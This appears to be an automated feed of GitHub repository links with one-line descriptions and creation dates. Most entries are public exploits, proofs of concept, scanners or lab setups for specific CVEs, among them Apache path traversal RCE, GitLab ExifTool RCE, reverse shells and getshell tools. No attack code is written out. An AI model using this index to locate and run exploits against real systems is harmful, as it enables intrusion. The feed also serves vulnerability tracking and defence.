**Exploit for CVE-2017-17562 vulnerability, that allows RCE on GoAhead (< v3.6.5) if the CGI is enabled and a CGI program is dynamically linked.** : [fssecur3/goahead-rce-exploit](https://github.com/fssecur3/goahead-rce-exploit) create time: 2021-11-14T14:30:10Z

**no description** : [xMohamed0/CVE-2020-5504-phpMyAdmin](https://github.com/xMohamed0/CVE-2020-5504-phpMyAdmin) create time: 2021-11-14T14:54:04Z

**no description** : [xMohamed0/CVE-2021-42013-ApacheRCE](https://github.com/xMohamed0/CVE-2021-42013-ApacheRCE) create time: 2021-11-14T14:58:26Z

**no description** : [xMohamed0/CVE-2021-21315-POC](https://github.com/xMohamed0/CVE-2021-21315-POC) create time: 2021-11-14T14:52:25Z

**no description** : [xMohamed0/CVE-2021-41773](https://github.com/xMohamed0/CVE-2021-41773) create time: 2021-11-14T14:50:45Z

**针对 CVE-2020-7699 的复现,软件安全原理课程大作业** : [hemaoqi-Tom/CVE-2020-7699_reproduce](https://github.com/hemaoqi-Tom/CVE-2020-7699_reproduce) create time: 2021-11-14T14:07:17Z

**Dummy github repo for CVE-2021-32724 vulnerability exploit testing** : [MaximeSchlegel/AMUM2-CVE-2021-32724-Target](https://github.com/MaximeSchlegel/AMUM2-CVE-2021-32724-Target) create time: 2021-11-14T14:06:18Z

**CVE-2021-41351-poc** : [JaneMandy/CVE-2021-41351-POC](https://github.com/JaneMandy/CVE-2021-41351-POC) create time: 2021-11-14T09:14:56Z

**no description** : [simon242/CVE-2021-42013](https://github.com/simon242/CVE-2021-42013) create time: 2021-11-14T08:43:55Z

**CSP Playground for CVE-2021-30682** : [threatnix/csp-playground](https://github.com/threatnix/csp-playground) create time: 2021-10-15T08:10:02Z

**no description** : [kubota/POC-CVE-2021-41773](https://github.com/kubota/POC-CVE-2021-41773) create time: 2021-11-14T02:02:45Z

**no description** : [redteambrasil/CVE-2019-19550](https://github.com/redteambrasil/CVE-2019-19550) create time: 2021-11-13T20:32:49Z

**no description** : [redteambrasil/CVE-2020-24030](https://github.com/redteambrasil/CVE-2020-24030) create time: 2021-11-13T20:42:31Z

**no description** : [redteambrasil/CVE-2020-24029](https://github.com/redteambrasil/CVE-2020-24029) create time: 2021-11-13T20:39:59Z

**no description** : [redteambrasil/CVE-2020-24028](https://github.com/redteambrasil/CVE-2020-24028) create time: 2021-11-13T20:37:12Z

**Python script to exploit webmin vulnerability cve-2006-3392** : [gb21oc/ExploitWebmin](https://github.com/gb21oc/ExploitWebmin) create time: 2021-11-13T18:40:15Z

**A login bypass(CVE-2019-18371) and a command injection vulnerability(CVE-2019-18370) in Xiaomi Router R3G up to versi…** : [AjayMT6/UltramanGaia](https://github.com/AjayMT6/UltramanGaia) create time: 2021-11-13T12:51:18Z

**no description** : [CppXL/cve-2021-40449-poc](https://github.com/CppXL/cve-2021-40449-poc) create time: 2021-11-12T11:49:10Z

**no description** : [sinjeanmin/cvedetails_2019](https://github.com/sinjeanmin/cvedetails_2019) create time: 2021-11-12T10:08:31Z

**no description** : [DarkSprings/CVE-2021-38666-poc](https://github.com/DarkSprings/CVE-2021-38666-poc) create time: 2021-11-12T02:21:27Z

**Dockerized Proof-of-Concept of CVE-2021-40438 in Apache 2.4.48.** : [ericmann/apache-cve-poc](https://github.com/ericmann/apache-cve-poc) create time: 2021-11-11T19:51:45Z

**This script was written for the 'Intro PoC Scripting' room on TryHackMe.com** : [SlizBinksman/CVE_2012-2982](https://github.com/SlizBinksman/CVE_2012-2982) create time: 2021-11-11T17:13:17Z

**1111111111111111111** : [RichardKabuto/CVE-2021-111199](https://github.com/RichardKabuto/CVE-2021-111199) create time: 2021-11-11T06:24:03Z

**GitLab CE/EE Preauth RCE using ExifTool** : [inspiringz/CVE-2021-22205](https://github.com/inspiringz/CVE-2021-22205) create time: 2021-11-11T04:34:07Z

**仅为测试** : [RichardKabuto/CVE-2021-65334](https://github.com/RichardKabuto/CVE-2021-65334) create time: 2021-11-11T03:46:30Z

**A Zeek package to detect CVE-2021-42292, a Microsoft Excel local privilege escalation exploit.** : [corelight/CVE-2021-42292](https://github.com/corelight/CVE-2021-42292) create time: 2021-11-09T12:14:45Z

**这是一个测试而已** : [RichardKabuto/CVE-2021-98777](https://github.com/RichardKabuto/CVE-2021-98777) create time: 2021-11-10T15:51:27Z

**no description** : [ahmad4fifz/docker-cve-2021-22205](https://github.com/ahmad4fifz/docker-cve-2021-22205) create time: 2021-11-10T13:57:55Z

**2222222** : [RichardKabuto/CVE-2021-88888](https://github.com/RichardKabuto/CVE-2021-88888) create time: 2021-11-10T13:38:46Z

**1111111** : [RichardKabuto/CVE-2021-9876](https://github.com/RichardKabuto/CVE-2021-9876) create time: 2021-11-10T11:58:49Z

**no description** : [RichardKabuto/CVE-2021-99999](https://github.com/RichardKabuto/CVE-2021-99999) create time: 2021-11-10T11:55:22Z

**no description** : [RichardKabuto/CVE-2021-77778](https://github.com/RichardKabuto/CVE-2021-77778) create time: 2021-11-10T10:59:37Z

**VMWARE VCENTER SERVER VIRTUAL SAN HEALTH CHECK PLUG-IN RCE (CVE-2021-21985)** : [sknux/CVE-2021-21985_PoC](https://github.com/sknux/CVE-2021-21985_PoC) create time: 2021-11-09T19:06:29Z

**no description** : [faisalfs10x/GitLab-CVE-2021-22205-scanner](https://github.com/faisalfs10x/GitLab-CVE-2021-22205-scanner) create time: 2021-11-09T18:19:43Z

**Contains the offensive (exploit and auxiliary) modules for the CVE-2021-40444.** : [Zeop-CyberSec/word_mshtml](https://github.com/Zeop-CyberSec/word_mshtml) create time: 2021-11-08T17:38:30Z

**A local attacker could bypass the app password using a race condition in Sophos Secure Workspace for Android before version 9.7.3115.** : [ctuIhu/CVE-2021-36808](https://github.com/ctuIhu/CVE-2021-36808) create time: 2021-11-09T07:48:55Z

**apache flink目录遍历(CVE-2020-17519)** : [thebatmanfuture/apacheflink----POC](https://github.com/thebatmanfuture/apacheflink----POC) create time: 2021-11-09T04:48:13Z

**no description** : [ahmad4fifz/docker-cve-2021-41773](https://github.com/ahmad4fifz/docker-cve-2021-41773) create time: 2021-11-09T05:13:17Z

**This Metasploit module exploits an unauthenticated remote code execution vulnerability which exists in Apache version 2.4.49 (CVE-2021-41773). If files outside of the document root are not protected by ‘require all denied’ and CGI has been explicitly enabled, it can be used to execute arbitrary commands. This vulnerability has been reintroduced in the Apache 2.4.50 fix (CVE-2021-42013).** : [IcmpOff/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit](https://github.com/IcmpOff/Apache-2.4.49-2.4.50-Traversal-Remote-Code-Execution-Exploit) create time: 2021-11-09T02:38:13Z

**trusty poc Provide it to legitimate people** : [DarkSprings/CVE-2021-43267-POC](https://github.com/DarkSprings/CVE-2021-43267-POC) create time: 2021-11-09T02:14:13Z

**no description** : [Pastea/CVE-2013-2165](https://github.com/Pastea/CVE-2013-2165) create time: 2021-11-08T21:07:35Z

**no description** : [Pastea/CVE-2018-12533](https://github.com/Pastea/CVE-2018-12533) create time: 2021-11-08T21:10:20Z

**A sample POC for CVE-2021-30657 affecting MacOS** : [shubham0d/CVE-2021-30657](https://github.com/shubham0d/CVE-2021-30657) create time: 2021-11-07T18:33:35Z

**no description** : [bartutku/CVE-2021-43361](https://github.com/bartutku/CVE-2021-43361) create time: 2021-11-08T13:23:09Z

**HAProxy CVE-2021-40346** : [Vulnmachines/HAProxy_CVE-2021-40346](https://github.com/Vulnmachines/HAProxy_CVE-2021-40346) create time: 2021-11-08T11:53:45Z

**no description** : [BeneficialCode/CVE-2021-1732](https://github.com/BeneficialCode/CVE-2021-1732) create time: 2021-09-24T01:28:58Z

**Exploit for CVE-2021-40449** : [Kristal-g/CVE-2021-40449_poc](https://github.com/Kristal-g/CVE-2021-40449_poc) create time: 2021-11-07T16:15:19Z

**Python exploit for CVE-2011-2523 (vsftpd 2.3.4)** : [padsalatushal/vsftpd_2.3.4_Exploit](https://github.com/padsalatushal/vsftpd_2.3.4_Exploit) create time: 2021-11-07T06:20:27Z

**Checks your files for existence of Unicode BIDI characters which can be misused for supply chain attacks. See CVE-2021-42574** : [maweil/bidi_char_detector](https://github.com/maweil/bidi_char_detector) create time: 2021-11-06T22:12:35Z

**no description** : [Erikten/CVE-2021-3129](https://github.com/Erikten/CVE-2021-3129) create time: 2021-11-06T14:24:54Z

**JWT Exploit** : [mmeza-developer/CVE-2018-0114](https://github.com/mmeza-developer/CVE-2018-0114) create time: 2021-11-06T04:16:10Z

**no description** : [mmeza-developer/CVE-2019-5420-RCE](https://github.com/mmeza-developer/CVE-2019-5420-RCE) create time: 2021-11-06T04:24:43Z

**Pickle Serialization Remote Code Execution - Memcached Poisoning** : [CarlosG13/CVE-2021-33026](https://github.com/CarlosG13/CVE-2021-33026) create time: 2021-11-05T18:11:54Z

**Exploit for GitLab CVE-2021-22205 Unauthenticated Remote Code Execution** : [runsel/GitLab-CVE-2021-22205-](https://github.com/runsel/GitLab-CVE-2021-22205-) create time: 2021-11-05T16:56:06Z

**Automated Gitlab RCE via CVE-2021-22205** : [X1pe0/Automated-Gitlab-RCE](https://github.com/X1pe0/Automated-Gitlab-RCE) create time: 2021-11-05T16:48:11Z

**CVE-2021-42671 - Broken access control vulnerability in the Engineers online portal system.** : [TheHackingRabbi/CVE-2021-42671](https://github.com/TheHackingRabbi/CVE-2021-42671) create time: 2021-11-03T21:34:23Z

**CVE-2021-42670 - SQL Injection vulnerability in the Engineers online portal system.** : [TheHackingRabbi/CVE-2021-42670](https://github.com/TheHackingRabbi/CVE-2021-42670) create time: 2021-11-03T21:25:43Z

**CVE-2021-42669 - Remote code execution via unrestricted file upload vulnerability in the Engineers online portal system.** : [TheHackingRabbi/CVE-2021-42669](https://github.com/TheHackingRabbi/CVE-2021-42669) create time: 2021-11-03T20:52:08Z

**CVE-2021-42668 - SQL Injection vulnerability in the Engineers online portal system.** : [TheHackingRabbi/CVE-2021-42668](https://github.com/TheHackingRabbi/CVE-2021-42668) create time: 2021-11-03T20:43:30Z

**CVE-2021-42667 - SQL Injection vulnerability in the Online event booking and reservation system.** : [TheHackingRabbi/CVE-2021-42667](https://github.com/TheHackingRabbi/CVE-2021-42667) create time: 2021-11-03T20:31:30Z

**CVE-2021-42666 - SQL Injection vulnerability in the Engineers online portal system.** : [TheHackingRabbi/CVE-2021-42666](https://github.com/TheHackingRabbi/CVE-2021-42666) create time: 2021-11-03T20:14:58Z

**CVE-2021-42665 - SQL Injection authentication bypass vulnerability in the Engineers online portal system.** : [TheHackingRabbi/CVE-2021-42665](https://github.com/TheHackingRabbi/CVE-2021-42665) create time: 2021-11-03T19:58:58Z

**CVE-2021-42664 - Stored Cross-Site Scripting vulnerability in the Engineers online portal system.** : [TheHackingRabbi/CVE-2021-42664](https://github.com/TheHackingRabbi/CVE-2021-42664) create time: 2021-11-03T19:29:57Z

**CVE-2021-42663 - HTML Injection vulnerability in the Online event booking and reservation system.** : [TheHackingRabbi/CVE-2021-42663](https://github.com/TheHackingRabbi/CVE-2021-42663) create time: 2021-11-03T18:49:28Z

**no description** : [Peterpan0927/TFC-Chrome-v8-bug-CVE-2021-38001-poc](https://github.com/Peterpan0927/TFC-Chrome-v8-bug-CVE-2021-38001-poc) create time: 2021-11-05T03:18:46Z

**no description** : [hh-hunter/cve-2021-22205](https://github.com/hh-hunter/cve-2021-22205) create time: 2021-11-05T05:35:10Z

**no description** : [maldiohead/TFC-Chrome-v8-bug-CVE-2021-38001-poc](https://github.com/maldiohead/TFC-Chrome-v8-bug-CVE-2021-38001-poc) create time: 2021-11-05T02:58:15Z

**Some docker images to play with CVE-2021-41773 and CVE-2021-42013** : [Hydragyrum/CVE-2021-41773-Playground](https://github.com/Hydragyrum/CVE-2021-41773-Playground) create time: 2021-11-04T22:52:44Z

**A list of CVEs patched and unpatched in 2021.** : [xbdmdev/0days-In-The-Wild](https://github.com/xbdmdev/0days-In-The-Wild) create time: 2021-11-04T17:42:01Z

**Modification of gitlab exploit anything under 13.10** : [ph-arm/CVE-2021-22204-Gitlab](https://github.com/ph-arm/CVE-2021-22204-Gitlab) create time: 2021-11-04T14:31:02Z

**Exploitation code for CVE-2021-40539** : [synacktiv/CVE-2021-40539](https://github.com/synacktiv/CVE-2021-40539) create time: 2021-11-03T14:49:27Z

**CVE-2021-22205& GitLab CE/EE RCE** : [devdanqtuan/CVE-2021-22205](https://github.com/devdanqtuan/CVE-2021-22205) create time: 2021-11-04T09:01:07Z

**no description** : [zkhalidul/GrabberWP-CVE-2017-5487](https://github.com/zkhalidul/GrabberWP-CVE-2017-5487) create time: 2021-11-04T02:25:57Z

**CVE-2021-42662 - Stored Cross-Site Scripting vulnerability in the Online event booking and reservation system.** : [TheHackingRabbi/CVE-2021-42662](https://github.com/TheHackingRabbi/CVE-2021-42662) create time: 2021-11-03T17:51:55Z

**It is a simple tool to exploit local file include . vulnerabilities** : [Adel-kaka-dz/CVE-2006-3392](https://github.com/Adel-kaka-dz/CVE-2006-3392) create time: 2021-11-03T19:51:31Z

**Information about CVE-2021-43141, a reflected XSS in the plan_application section.** : [Dir0x/CVE-2021-43141](https://github.com/Dir0x/CVE-2021-43141) create time: 2021-11-03T17:51:29Z

**SQL injection vulnerability in login exists in Sourcecodester Simple Subscription Website.** : [Dir0x/CVE-2021-43140](https://github.com/Dir0x/CVE-2021-43140) create time: 2021-11-03T17:39:22Z

**Exploit Apache 2.4.50(CVE-2021-42013)** : [robotsense1337/CVE-2021-42013](https://github.com/robotsense1337/CVE-2021-42013) create time: 2021-11-03T17:33:52Z

**cve-2020-0022** : [devdanqtuan/poc-for-cve-2020-0022](https://github.com/devdanqtuan/poc-for-cve-2020-0022) create time: 2021-11-03T15:48:53Z

**PoC for CVE-2015-1635 / MS15-034 - HTTP.sys Allows Remote Code Execution / Check & DOS** : [nksf7/CVE-2015-1635](https://github.com/nksf7/CVE-2015-1635) create time: 2021-11-03T14:50:55Z

**Directory Traversal in Afterlogic webmail aurora and pro** : [dorkerdevil/CVE-2021-26294](https://github.com/dorkerdevil/CVE-2021-26294) create time: 2021-11-03T14:32:13Z

**no description** : [guidepointsecurity/CVE-2021-29156](https://github.com/guidepointsecurity/CVE-2021-29156) create time: 2021-11-03T13:21:50Z

**PoC for CVE-2020-14181 - Jira User Enumeration via /ViewUserHover.jspa** : [nksf7/CVE-2020-14181](https://github.com/nksf7/CVE-2020-14181) create time: 2021-11-03T10:51:38Z

**redoing cve_2020 repository** : [sinjeanmin/cvedetails_2020_final](https://github.com/sinjeanmin/cvedetails_2020_final) create time: 2021-11-03T10:47:30Z

**no description** : [imojne/CVE-2018-6574-POC](https://github.com/imojne/CVE-2018-6574-POC) create time: 2021-11-03T09:15:52Z

**POC for CVE-2021-34429** : [ColdFusionX/CVE-2021-34429](https://github.com/ColdFusionX/CVE-2021-34429) create time: 2021-11-03T09:13:12Z

**Test vulnerability of CVE-2020-3452** : [Aviksaikat/CVE-2020-3452](https://github.com/Aviksaikat/CVE-2020-3452) create time: 2021-11-03T07:27:14Z

**the metasploit script(POC) about CVE-2021-36260** : [TaroballzChen/CVE-2021-36260-metasploit](https://github.com/TaroballzChen/CVE-2021-36260-metasploit) create time: 2021-11-03T08:11:49Z

**WordPress Plugin HTML Author Bio description XSS** : [dnr6419/CVE-2021-24545](https://github.com/dnr6419/CVE-2021-24545) create time: 2021-11-03T05:41:46Z

**fuel CMS 1.4.1 - Remote Code Execution** : [Trushal2004/CVE-2018-16763](https://github.com/Trushal2004/CVE-2018-16763) create time: 2021-11-03T04:38:54Z

**Generate malicious files using recently published homoglyphic-attack (CVE-2021-42694)** : [js-on/CVE-2021-42694](https://github.com/js-on/CVE-2021-42694) create time: 2021-11-02T20:39:47Z

**Generate malicious files using recently published bidi-attack (CVE-2021-42574)** : [js-on/CVE-2021-42574](https://github.com/js-on/CVE-2021-42574) create time: 2021-11-02T15:32:38Z

**no description** : [josebarahona1895/cvenlinea2021](https://github.com/josebarahona1895/cvenlinea2021) create time: 2021-07-23T18:38:22Z

**Applications that reproduce CVE-2021-22119** : [mari6274/oauth-client-exploit](https://github.com/mari6274/oauth-client-exploit) create time: 2021-11-02T15:16:24Z

**WIP kernel exploit for minor bug i found in amd gpu driver** : [docfate111/CVE-2021-42327](https://github.com/docfate111/CVE-2021-42327) create time: 2021-10-28T21:10:29Z

**no description** : [x6Hook/CVE-2018-6574](https://github.com/x6Hook/CVE-2018-6574) create time: 2021-11-01T19:06:24Z

**no description** : [hffaust/CVE-2021-42574_and_CVE-2021-42694](https://github.com/hffaust/CVE-2021-42574_and_CVE-2021-42694) create time: 2021-11-01T17:13:50Z

**MovableType XMLRPC - RCE** : [Cosemz/CVE-2021-20837](https://github.com/Cosemz/CVE-2021-20837) create time: 2021-11-01T13:32:57Z

**no description** : [shiomiyan/CVE-2021-42574](https://github.com/shiomiyan/CVE-2021-42574) create time: 2021-11-01T13:05:48Z

**no description** : [Qclover/Gitlab_RCE_CVE_2021_2205](https://github.com/Qclover/Gitlab_RCE_CVE_2021_2205) create time: 2021-11-01T07:38:45Z

**CVE-2021-22205-getshell** : [shang159/CVE-2021-22205-getshell](https://github.com/shang159/CVE-2021-22205-getshell) create time: 2021-11-01T06:06:04Z

**no description** : [AkBanner/CVE-2021-22205](https://github.com/AkBanner/CVE-2021-22205) create time: 2021-11-01T05:42:17Z

**Windows HTTP协议栈远程代码执行漏洞 CVE-2021-31166** : [antx-code/CVE-2021-31166](https://github.com/antx-code/CVE-2021-31166) create time: 2021-09-27T05:56:45Z

**Gitlab CI Lint API未授权 SSRF漏洞 CVE-2021-22214** : [antx-code/CVE-2021-22214](https://github.com/antx-code/CVE-2021-22214) create time: 2021-11-01T04:04:42Z

**personal** : [b3tterm4n/CVE-2021-22205](https://github.com/b3tterm4n/CVE-2021-22205) create time: 2021-10-29T09:09:45Z

**CVE-2021-22205 RCE** : [c0okB/CVE-2021-22205](https://github.com/c0okB/CVE-2021-22205) create time: 2021-10-31T14:34:51Z

**POC Jamovi <=1.6.18 is affected by a cross-site scripting (XSS) vulnerability. The column-name is vulnerable to XSS in the ElectronJS Framework. An attacker can make a .omv (Jamovi) document containing a payload. When opened by victim, the payload is triggered.** : [g33xter/CVE-2021-28079](https://github.com/g33xter/CVE-2021-28079) create time: 2021-10-31T08:29:53Z

**CVE-2021-22205漏洞检测** : [Seals6/CVE-2021-22205](https://github.com/Seals6/CVE-2021-22205) create time: 2021-10-31T04:15:30Z

**have a test** : [ohnonoyesyes/CVE-2021-20837](https://github.com/ohnonoyesyes/CVE-2021-20837) create time: 2021-10-31T01:37:10Z

**no description** : [bypazs/CVE-2020-0668](https://github.com/bypazs/CVE-2020-0668) create time: 2021-10-30T17:28:54Z

**no description** : [bypazs/cve-2020-0668.exe](https://github.com/bypazs/cve-2020-0668.exe) create time: 2021-10-30T17:15:01Z

**CVE-2019-9729. Transferred from https://github.com/DoubleLabyrinth/SdoKeyCrypt-sys-local-privilege-elevation** : [timeowilliamsq/HyperSine](https://github.com/timeowilliamsq/HyperSine) create time: 2021-10-30T15:56:37Z

**no description** : [anaCvetkovic1234/Ana-Cvetkovic-0427-2018-Bunus2](https://github.com/anaCvetkovic1234/Ana-Cvetkovic-0427-2018-Bunus2) create time: 2021-10-30T12:37:28Z

**no description** : [anaCvetkovic1234/Ana-Cvetkovic-0427-2018-Bonus2](https://github.com/anaCvetkovic1234/Ana-Cvetkovic-0427-2018-Bonus2) create time: 2021-10-30T12:33:19Z

**PoC in single line bash** : [findneo/GitLab-preauth-RCE_CVE-2021-22205](https://github.com/findneo/GitLab-preauth-RCE_CVE-2021-22205) create time: 2021-10-30T11:54:29Z

**C# POC for CVE-2021-26855 aka ProxyLogon, supports the classically semi-interactive web shell as well as shellcode in…** : [yaoxiaoangry3/Flangvik](https://github.com/yaoxiaoangry3/Flangvik) create time: 2021-10-30T11:31:48Z

**XMLRPC - RCE in MovableTypePoC** : [oxctdev/CVE-2021-20837](https://github.com/oxctdev/CVE-2021-20837) create time: 2021-10-30T09:15:56Z

**CVE-2021-22205 移除了对djvumake & djvulibre的依赖,可在win平台使用** : [whwlsfb/CVE-2021-22205](https://github.com/whwlsfb/CVE-2021-22205) create time: 2021-10-30T02:56:34Z

**no description** : [kienquoc102/CVE-2017-8225](https://github.com/kienquoc102/CVE-2017-8225) create time: 2021-10-30T02:28:27Z

**HeartBleed (CVE-2014-0160) vulnerability detector written in go, hopefully a webapp added soon :)** : [joshmerr/goHeartBleed](https://github.com/joshmerr/goHeartBleed) create time: 2021-10-29T23:25:29Z

**Remote Code Execution (RCE) vulnerability exists in Sourcecodester Online Reviewer System 1.0 by uploading a maliciously crafted PHP file that bypasses the image upload filters..** : [hax3xploit/CVE-2021-41646](https://github.com/hax3xploit/CVE-2021-41646) create time: 2021-10-29T22:31:32Z

**Remote Code Execution (RCE) vulnerability exists in Sourcecodester Budget and Expense Tracker System 1.0 that allows a remote malicious user to inject arbitrary code via the image upload field.** : [hax3xploit/CVE-2021-41645](https://github.com/hax3xploit/CVE-2021-41645) create time: 2021-10-29T22:30:21Z

**Remote Code Exection (RCE) vulnerability exists in Sourcecodester Online Food Ordering System 2.0 via a maliciously crafted PHP file that bypasses the image upload filters.** : [hax3xploit/CVE-2021-41644](https://github.com/hax3xploit/CVE-2021-41644) create time: 2021-10-29T22:28:01Z

**Remote Code Execution (RCE) vulnerability exists in Sourcecodester Church Management System 1.0 via the image upload field.** : [hax3xploit/CVE-2021-41643](https://github.com/hax3xploit/CVE-2021-41643) create time: 2021-10-29T22:24:42Z

**no description** : [0xAgun/CVE-2019-18935-checker](https://github.com/0xAgun/CVE-2019-18935-checker) create time: 2021-10-29T16:57:46Z

**no description** : [scopion/CVE-2018-8947](https://github.com/scopion/CVE-2018-8947) create time: 2021-10-29T15:12:35Z

**no description** : [scopion/cve-2019-9081](https://github.com/scopion/cve-2019-9081) create time: 2021-10-29T14:47:39Z

**no description** : [scopion/CVE-2020-10963](https://github.com/scopion/CVE-2020-10963) create time: 2021-10-29T14:56:05Z

**Post authenticated stored-xss in XenForo versions ≤ 2.2.7** : [SakuraSamuraii/CVE-2021-43032](https://github.com/SakuraSamuraii/CVE-2021-43032) create time: 2021-10-29T14:09:44Z

**no description** : [p0dalirius/CVE-2016-10956_mail_masta](https://github.com/p0dalirius/CVE-2016-10956_mail_masta) create time: 2021-10-29T12:31:21Z

**Setup vulnerable enviornment** : [wolf1892/CVE-2021-41773](https://github.com/wolf1892/CVE-2021-41773) create time: 2021-10-29T06:31:57Z

**CVE-2021-22205& GitLab CE/EE RCE** : [Al1ex/CVE-2021-22205](https://github.com/Al1ex/CVE-2021-22205) create time: 2021-10-29T04:30:45Z

**Gitlab RCE 未授权远程代码执行漏洞** : [antx-code/CVE-2021-22205](https://github.com/antx-code/CVE-2021-22205) create time: 2021-10-29T04:15:00Z

**Exploit of CVE-2017-7529** : [rajesh457/CVE-2017-7529](https://github.com/rajesh457/CVE-2017-7529) create time: 2021-10-29T01:08:23Z

**An attempt to reproduce Microsoft MSHTML Remote Code Execution (RCE) Vulnerability and using Metasploit Framework.** : [0xK4gura/CVE-2021-40444-POC](https://github.com/0xK4gura/CVE-2021-40444-POC) create time: 2021-10-28T14:55:46Z

**CVE-2021-22205 Exploit** : [r0eXpeR/CVE-2021-22205](https://github.com/r0eXpeR/CVE-2021-22205) create time: 2021-10-28T14:02:51Z

**An attempt to reproduce Microsoft MSHTML Remote Code Execution Vulnerability** : [0xK4gura/CVE-2021-40444-POC](https://github.com/0xK4gura/CVE-2021-40444-POC) create time: 2021-10-28T13:40:23Z

**no description** : [BabyTeam1024/CVE-2021-40438](https://github.com/BabyTeam1024/CVE-2021-40438) create time: 2021-10-28T11:48:12Z

**no description** : [RobertDra/CVE-2021-31862](https://github.com/RobertDra/CVE-2021-31862) create time: 2021-10-28T07:18:01Z

**Pocsuite3 For CVE-2021-22205** : [RedTeamWing/CVE-2021-22205](https://github.com/RedTeamWing/CVE-2021-22205) create time: 2021-10-28T06:29:37Z

**Something about CVE-2020-0668** : [ycdxsb/CVE-2020-0668](https://github.com/ycdxsb/CVE-2020-0668) create time: 2021-10-28T05:30:14Z

**Something about CVE-2020-0668** : [ycdxsb/CVE-2020-0668](https://github.com/ycdxsb/CVE-2020-0668) create time: 2021-10-28T05:15:48Z

**批量扫描CVE-2020-0796** : [F6JO/CVE-2020-0796-Batch-scanning](https://github.com/F6JO/CVE-2020-0796-Batch-scanning) create time: 2021-10-28T03:39:03Z

**Information about CVE-2021-41728, a reflected XSS in the search function.** : [Dir0x/CVE-2021-41728](https://github.com/Dir0x/CVE-2021-41728) create time: 2021-10-27T20:04:12Z

**command injection vulnerability in the web server of some Hikvision product. Due to the insufficient input validation, attacker can exploit the vulnerability to launch a command injection attack by sending some messages with malicious commands.** : [Aiminsun/CVE-2021-36260](https://github.com/Aiminsun/CVE-2021-36260) create time: 2021-10-27T15:51:12Z

**cve-2021-42013.py is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.50** : [walnutsecurity/CVE-2021-42013](https://github.com/walnutsecurity/CVE-2021-42013) create time: 2021-10-27T14:29:10Z

**no description** : [b1tg/CVE-2021-34486-exp](https://github.com/b1tg/CVE-2021-34486-exp) create time: 2021-10-27T11:39:08Z

**no description** : [Trushal2004/CVE-2019-9053](https://github.com/Trushal2004/CVE-2019-9053) create time: 2021-10-27T09:40:32Z

**no description** : [Jun-5heng/CVE-2021-22005](https://github.com/Jun-5heng/CVE-2021-22005) create time: 2021-10-27T08:36:21Z

**WooCommerce exploit** : [andnorack/CVE-2021-32789](https://github.com/andnorack/CVE-2021-32789) create time: 2021-10-27T04:15:07Z

**no description** : [rafaelcaria/drupalgeddon2-CVE-2018-7600](https://github.com/rafaelcaria/drupalgeddon2-CVE-2018-7600) create time: 2021-10-27T03:09:48Z

**no description** : [volysandro/cve_2019-6447](https://github.com/volysandro/cve_2019-6447) create time: 2021-10-26T08:46:41Z

**Ce programme permet de détecter une faille RCE sur les serveurs Apache 2.4.49 et Apache 2.4.50** : [Balgogan/CVE-2021-41773](https://github.com/Balgogan/CVE-2021-41773) create time: 2021-10-26T19:11:28Z

**Remote Code Execution exploit for Apache servers. Affected versions: Apache 2.4.49, Apache 2.4.50** : [mr-exo/CVE-2021-41773](https://github.com/mr-exo/CVE-2021-41773) create time: 2021-10-26T17:56:25Z

**no description** : [SECFORCE/CVE-2021-37748](https://github.com/SECFORCE/CVE-2021-37748) create time: 2021-10-25T12:16:41Z

**Google Chrome Vulnerabilities CVE-2021-30573** : [kh4sh3i/CVE-2021-30573](https://github.com/kh4sh3i/CVE-2021-30573) create time: 2021-10-26T07:44:27Z

**CVE-2021-26084,Atlassian Confluence OGNL注入漏洞** : [lleavesl/CVE-2021-26084](https://github.com/lleavesl/CVE-2021-26084) create time: 2021-10-26T06:01:38Z

**no description** : [kienquoc102/CVE-2017-8225](https://github.com/kienquoc102/CVE-2017-8225) create time: 2021-08-16T03:34:17Z

**ReadTeam-CVE-2021** : [DD885/ReadTeam-CVE-2021](https://github.com/DD885/ReadTeam-CVE-2021) create time: 2021-10-26T02:23:12Z

**Script fo testing CVE-2000-0649 for Apache and MS ISS servers** : [stevenvegar/cve-2000-0649](https://github.com/stevenvegar/cve-2000-0649) create time: 2021-10-25T23:14:04Z

**A automatic scanner to apache 2.4.49** : [vida00/Scanner-CVE-2021-41773](https://github.com/vida00/Scanner-CVE-2021-41773) create time: 2021-10-25T21:34:08Z

**PoC for the CVE-2021-20837 : RCE in MovableType** : [ghost-nemesis/cve-2021-20837-poc](https://github.com/ghost-nemesis/cve-2021-20837-poc) create time: 2021-10-25T21:25:39Z

**no description** : [MazX0p/CVE-2021-41773](https://github.com/MazX0p/CVE-2021-41773) create time: 2021-10-25T18:21:43Z

**A python script intended to automate the exploitation of the ShellSchock vulnerability (CVE-2014-6271)** : [alexphiliotis/ShellShock](https://github.com/alexphiliotis/ShellShock) create time: 2021-10-25T16:13:48Z

**Google Chrome Vulnerabilities CVE-2021-30573** : [oxctdev/CVE-2021-30573](https://github.com/oxctdev/CVE-2021-30573) create time: 2021-10-25T13:25:23Z

**My exploit for CVE-2021-40449, a Windows LPE via a UAF in win32kfull!GreResetDCInternal.** : [hakivvi/CVE-2021-40449](https://github.com/hakivvi/CVE-2021-40449) create time: 2021-10-25T04:58:49Z

**A Zeek package which raises notices for Path Traversal/RCE in Apache HTTP Server 2.4.49 (CVE-2021-41773) and 2.4.50 (CVE-2021-42013)** : [corelight/CVE-2021-41773](https://github.com/corelight/CVE-2021-41773) create time: 2021-10-08T06:54:27Z

**no description** : [Jun-5heng/CVE-2021-26084](https://github.com/Jun-5heng/CVE-2021-26084) create time: 2021-10-25T03:07:28Z

**no description** : [TiagoSergio/CVE-2021-40444](https://github.com/TiagoSergio/CVE-2021-40444) create time: 2021-10-24T23:17:12Z

**no description** : [TiagoSergio/CVE-2021-22005](https://github.com/TiagoSergio/CVE-2021-22005) create time: 2021-10-24T23:14:01Z

**Exploit to CVE-2004-2687 vulnerability** : [sukraken/distcc_exploit.py](https://github.com/sukraken/distcc_exploit.py) create time: 2021-10-24T21:22:17Z

**PoC CVE-2021-42013 reverse shell Apache 2.4.50 with CGI** : [TheLastVvV/CVE-2021-42013_Reverse-Shell](https://github.com/TheLastVvV/CVE-2021-42013_Reverse-Shell) create time: 2021-10-24T12:57:55Z

**CVE-2021-41773 is a python script that will help in finding Path Traversal or Remote Code Execution vulnerability in Apache 2.4.49** : [walnutsecurity/cve-2021-41773](https://github.com/walnutsecurity/cve-2021-41773) create time: 2021-10-23T12:31:53Z

**CVE-2021-40438 exploit PoC with Docker setup.** : [sixpacksecurity/CVE-2021-40438](https://github.com/sixpacksecurity/CVE-2021-40438) create time: 2021-10-24T10:18:08Z
